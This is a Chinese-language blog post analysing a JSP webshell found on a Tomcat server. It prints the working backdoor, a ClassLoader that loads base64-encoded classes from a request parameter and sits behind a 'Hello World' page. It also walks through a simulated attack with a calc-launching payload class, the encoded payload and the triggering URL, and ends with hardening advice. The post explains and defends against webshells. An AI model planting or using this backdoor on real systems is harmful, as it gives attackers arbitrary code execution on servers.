一次被木馬攻擊的記錄

語言: CN / TW / HK

描述

最近一個老同學跟我說他部署在阿里雲上的系統,在tomcat的目錄下出現了一個index.jsp檔案,內容大致如下:

image-20210728190124402.png

我一看發現這不就是一個木馬後門檔案嗎,只需要通過引數ejiaogl傳入一個經過base64編碼的Class檔案,這樣就可以解碼然後被類載入器載入,而我們知道類被載入的時候是可以執行static程式碼塊的,而這個程式碼塊可以任由攻擊者來指定要執行的程式碼,是非常危險的,為了更加形象我特意做了一個模擬攻擊。

模擬攻擊

準備木馬檔案

準備一個Tomcat,直接啟動即可,預設訪問的是ROOT目錄下的index.jsp,準備好以上的木馬後門檔案直接替換,檔案如下:

<%!
//自定義了一個類載入器
class U extends ClassLoader{
    U(ClassLoader c){
        super(c);
    }
    
    public Class g(byte[] b) {
        return this.defineClass(b, 0, b.length);
    }
}
​
public byte[] base64Decoder(String str) throws Exception {
    try {
        Class clazz = Class.forName("sun.misc.BASE64Decoder");
        return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
    } catch (Exception e) {
        //這裡還做了一個base64的相容處理
        Class clazz = Class.forName("java.util.Base64");
        Object decoder = clazz.getMethod("getDecoder").invoke(null);
        return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
    }
}
%>
<%
//接收base64編碼的字元
String cls = request.getParameter("ejiaogl");
if(cls != null){
    U u = new U(this.getClass().getClassLoader());
    byte[] b = base64Decoder(cls);
    Class clazz = u.g(b);
    // 這裡需要注意一下,ClassLoader方式並不會執行靜態程式碼塊,Class.forName可以執行靜態程式碼塊的
    clazz.newInstance();
}
%>
<html>
<body>
<h2>Hello World!</h2>
</body>
</html>

準備命令類

這裡準備一個簡單的命令類,列印日誌,同時呼叫本地的計算器:

import java.io.IOException;
public class Script {
​
    static {
        //非法操作
        System.out.println("==Illegal operation==");
        try {
            //開啟計算器
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
        }
    }
}

Base64字串

需要讀取Class檔案,然後轉換成一個Base64編碼的字串:

private static byte[] loadBytes(Class<?> cls) throws IOException {
        String name = cls.getCanonicalName().replaceAll("\.", "/") + ".class";
        InputStream is = ClassLoader.getSystemResourceAsStream(name);
        BufferedInputStream bis = new BufferedInputStream(is);
        try {
            int length = is.available();
            byte[] bs = new byte[length];
            bis.read(bs);
            return bs;
        } finally {
            bis.close();
            is.close();
        }
}
​
// 編碼操作
byte[] b = loadBytes(Script.class); 
String base64str = Base64.getEncoder().encodeToString(b);

以上生成的base64字串如下所示:

yv66vgAAADQALgcAAgEABlNjcmlwdAcABAEAEGphdmEvbGFuZy9PYmplY3QBAAg8Y2xpbml0PgEAAygpVgEABENvZGUJAAkACwcACgEAEGphdmEvbGFuZy9TeXN0ZW0MAAwADQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwgADwEAFT09SWxsZWdhbCBvcGVyYXRpb249PQoAEQATBwASAQATamF2YS9pby9QcmludFN0cmVhbQwAFAAVAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgoAFwAZBwAYAQARamF2YS9sYW5nL1J1bnRpbWUMABoAGwEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsIAB0BAARjYWxjCgAXAB8MACAAIQEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsHACMBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQANU3RhY2tNYXBUYWJsZQEABjxpbml0PgoAAwApDAAnAAYBAAR0aGlzAQAITFNjcmlwdDsBAApTb3VyY2VGaWxlAQALU2NyaXB0LmphdmEAIQABAAMAAAAAAAIACAAFAAYAAQAHAAAAVwACAAEAAAAWsgAIEg62ABC4ABYSHLYAHlenAARLsQABAAgAEQAUACIAAwAkAAAAEgAEAAAABgAIAAgAEQAJABUACwAlAAAAAgAAACYAAAAHAAJUBwAiAAABACcABgABAAcAAAAvAAEAAQAAAAUqtwAosQAAAAIAJAAAAAYAAQAAAAMAJQAAAAwAAQAAAAUAKgArAAAAAQAsAAAAAgAt

傳送請求

在瀏覽器中訪問如下地址:

http://localhost:8080/index.jsp?ejiaogl=以上base64字串

可以發現會生成相應的日誌,同時會呼叫伺服器端上的計算器,簡單模擬了一次攻擊;

Webshell

告警

當然阿里雲是給出告警的,告警內容如下所示:

image-20210729092147869.png

其中提到了index.jsp是一個木馬檔案,同時指定了木馬型別為Webshell;

簡介

webshell就是以asp、php、jsp或者cgi等網頁檔案形式存在的一種程式碼執行環境,主要用於網站管理、伺服器管理、許可權管理等操作。使用方法簡單,只需上傳一個程式碼檔案,通過網址訪問,便可進行很多日常操作,極大地方便了使用者對網站和伺服器的管理。正因如此,也有小部分人將程式碼修改後當作後門程式使用,以達到控制網站伺服器的目的。

一方面,webshell被站長常常用於網站管理、伺服器管理等等,根據FSO許可權的不同,作用有線上編輯網頁尾本、上傳下載檔案、檢視資料庫、執行任意程式命令等; 另一方面,被入侵者利用,從而達到控制網站伺服器的目的。這些網頁尾本常稱為WEB指令碼木馬,比較流行的asp或php木馬,也有基於.NET的指令碼木馬與JSP指令碼木馬。國內常用的WebShell有海陽ASP木馬,Phpspy,c99shell等。

安全防範

  1. 建議使用者通過ftp來上傳、維護網頁,儘量不安裝asp的上傳程式。
  2. 對asp上傳程式的呼叫一定要進行身份認證,並只允許信任的人使用上傳程式。
  3. asp程式管理員的使用者名稱和密碼要有一定複雜性,不能過於簡單,還要注意定期更換。
  4. 到正規網站下載程式,下載後要對資料庫名稱和存放路徑進行修改,資料庫名稱要有一定複雜性。
  5. 要儘量保持程式是最新版本。
  6. 不要在網頁上加註後臺管理程式登陸頁面的連結。
  7. 為防止程式有未知漏洞,可以在維護後刪除後臺管理程式的登陸頁面,下次維護時再通過上傳即可。
  8. 要時常備份資料庫等重要檔案。
  9. 日常要多維護,並注意空間中是否有來歷不明的asp檔案。
  10. 儘量關閉網站搜尋功能,利用外部搜尋工具,以防爆出資料。
  11. 利用白名單上傳檔案,不在白名單內的一律禁止上傳,上傳目錄許可權遵循最小許可權原則。

參考

https://baike.baidu.com/item/webshell/966625

https://www.freebuf.com/articles/web/235651.html

總結

對於一個網站來說安全性其實是最重要的,但是對很多程式設計師來說往往會忽視這個問題,因為很多公司都有專門的安全部門,很多安全問題其實並不會流轉到程式設計師手中;但我覺得我們程式設計師群體還是很有必要去了解一些安全方面的知識,一方面是保證了我們系統的安全性,另一方面其實也讓我們對一些知識點理解的更加透徹,往往給你一種“還可以這麼玩”的感覺。